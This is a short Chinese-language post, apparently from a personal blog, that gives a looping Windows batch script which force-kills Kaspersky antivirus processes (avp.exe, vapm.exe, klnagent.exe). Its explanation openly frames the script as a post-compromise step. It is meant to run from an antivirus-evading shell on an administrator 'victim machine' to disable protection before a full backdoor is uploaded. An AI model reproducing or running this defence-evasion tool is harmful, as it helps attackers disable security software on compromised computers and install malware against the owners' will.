管理员权限杀卡巴斯基进程
1 minute read
Code
:start
taskkill /F /IM avp.exe
taskkill /F /IM vapm.exe
taskkill /F /IM klnagent.exe
goto start
About
可用于一个管理员权限运行的免杀shell中执行这个批处理文件,运行后会不断强制杀死kaspersky的进程,但不会彻底杀掉,因为kaspersky会自动复活,但上面这个无限循环可使kaspersky的保护功能失效.可用上的场景:
- 1.受害机当前用户为administrator
- 2.受害机运行了一个免杀的shell(功能有限的shell,功能越少越好免杀),这个shell只有执行命令的功能
- 3.通过shell运行上面的批处理”杀死“kaspersky后再上大马,大马可不用免杀